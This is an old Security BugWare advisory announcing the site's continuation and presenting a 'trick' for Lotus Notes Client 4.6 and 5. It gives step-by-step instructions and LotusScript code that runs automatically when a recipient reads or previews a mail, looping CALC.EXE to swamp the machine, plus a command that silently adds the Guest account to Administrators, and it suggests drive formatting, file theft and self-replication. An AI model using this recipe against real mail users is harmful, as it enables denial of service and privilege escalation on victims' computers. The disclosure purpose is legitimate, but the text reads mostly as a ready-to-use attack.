Security BugWare Advisory

[irib () bunker freexion net (Yann)]

                    ----[www.securitybugware.org]----

                         < A D V I S O R I E S >

Dear World,

> From 1996 to 9th Sep 2001, Hrvoje Crvelin maintained the most  explicit  website
about bugs, exploits, and solutions. He decided to stop this project.

As there is no such resource on the web, we decided to keep this one alive.

Behind the new Security BugWare you can find a french organisation (association
loi 1901), which is a non-profit organisation. Our aim  is  to  continue Hrvoje
job, for all people like us who need to have a centralised  -  and straight  to
the point -  bug  information page.

For the better propaganda of this news, we offer you  an  exclusive  "Trick  of
the Trade" :



               Whacking A Machine With Lotus Notes Mail



COMMAND

    Lotus Notes Client

SYSTEMS AFFECTED

    Lotus Notes Client 5 All releases Lotus Notes Client 4.6 All releases

PROBLEM

    SecurityBugware team found following, as posted on www.securitybugware.org :

    With a little LotusScript in your mail, you can execute all what you want on
    the recipient's computer - even out of Notes.

    Follow these steps :

    1) Create a new mail, add recepients
    2) Go to the body and click in the menu "Create..Object"
    3) Select "Control" and any object you please such as "ActiveXPlugin Object"
    4) In Client 4.6 right click on the object to get "Properties"
       In Client 5 click on the menu the new "Applet" feature, and go to 
       "Properties"
       then check "run the object when the document is read"
    5) Then select "Edit events" : An event pane opens linked to the object
    6) In the "Initialize" section Add the following code, where "My EMAIL" 
       is your Lotus Notes account name (if you get this part wrong, you'll
       bomb yourself) :

              Sub Initialize
                     Dim TaskId As Integer
                     Dim session As New NotesSession
                     If session.CommonUserName<>"My EMAIL" Then
                        Do
                            TaskId%=Shell("CALC.EXE",1)
                        Loop
                     End If
              End Subv

    7) In the "Terminate" section, do the same :

              Sub Terminate
                     Dim TaskId As Integer
                     Dim session As New NotesSession
                     If session.CommonUserName<>"My EMAIL" Then
                         Do
                            TaskId%=Shell("CALC.EXE",1)
                         Loop
                     End If
              End Subv

    8) Click again on the "Initialize" section
    9) Hit the "Send" button, enjoy ;-)

    Your ActiveX (or other object you choosed) gets executed during the reading
    of the document. If the victim "previews" his mails without opening them...
    no problem, he will die anyway because a previsualisation is a reading.

    In this example we just run  the  calculator  in  loop,  but  there  can  be
    infinite  possibilities   like  formating   hard  drives,   sending  emails,
    replicating  the script to send it to the whole adressbook,  sending  files,
    stoling files from the victim hard drives without his notice etc...

    For instance you could replace the Do .. Loop by :

              TaskId%=Shell("CMD.EXE /C net localgroup " \"Administrators"\" /add guest ",1)

    which adds silentely account Guest to Administrative group

    In a few words, Lotus Intranet is a giant backdoor in itself.

    After some checks, it seems the smtp  gateway  don't  let  LotusScript  pass
    through. You can only play inside your Notes interconnected domains.


SOLUTION

    The only solution is to desactivate the preview,  and  to  delete  the  memo
    before reading it.


-- 
Security Bugware Team
Irib, Jitsu, Kiwi

www.securitybugware.org